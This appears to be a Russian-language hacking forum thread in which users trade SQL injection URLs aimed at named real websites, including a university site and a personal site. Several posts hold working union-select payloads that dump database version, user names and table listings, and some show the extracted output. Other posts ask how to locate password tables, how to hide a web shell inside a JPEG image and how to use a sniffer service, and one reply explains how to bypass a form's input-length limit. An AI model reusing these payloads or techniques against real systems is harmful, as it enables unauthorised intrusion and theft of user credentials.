судя по from user, from password хорошие данные с хорошим префиксом) или в другой дб rofl продвинутый способ локального инклуда (в серьёз не воспринимать) _eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+\boot.ini.lalala&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
Не понял, что там про from user, from password? Насколько мне известно, таких таблиц в Microsoft access не может быть. Или я что-то путаю?
Официальный сайт Евгении Власовой. Народ, я так понимаю это скуля? http://www.vlasova.com.ua/news.php?item=70' но роскрутить её дальше не могу...попробуйте
http://www.vlasova.com.ua/news.php?item=-70'+UniOn+SelecT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/* 4.1.22:vlasova:u_vlasova@localhost
Нашел вот скулю: http://students.msm.ru/sc/?act=view&op=anketa&uid=-1000'+union+select+1,version(),3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+/* Но никак не получается подобрать таблицы и столбцы((( Кому не влом, плиз, помогите...
народ как засунуть шелл в формат .jpg ну как на видео делают, там они заливают картинку а там шелл что то типа такого
Кто подскажет щас нормально работает сервис по сниферам http://na-s.ru/ ? А то почему то мне логи не проходят
Все еще интересует! Pashkela ACD несколько версий и я не знаю какую качать а вторая не хочет устанавливаться
помогите плиз найти таблицу с юзерами и пассами все облазил нигде не нашел(( http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables-- вывод всех таблиц p.s. Сайт казанского государственного университета
pinky07, используй limit в запросах: http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+30,20-- а то там скрипт только 20 таблиц выдает.
здрасти, собрался ставить булку так вот интересует вопрос как поставить фиксы на хаки(эксплоиты) или же надо самим в ручную капаца в php коде и вправлять?
Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка Could not obtain post/user information. DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8 SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3 Line : 449 File : viewtopic.php" Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value=">>"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??
1. "....тоесть в это поле можно вести только 3 символа!!" сохраняешь исходник страницы, правишь полный путь в форме к скрипту, и удаляешь параметр size="3". Как вариант отлавливаешь запрос naviscope+inetcrack правишь и отправляешь. 2. по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit
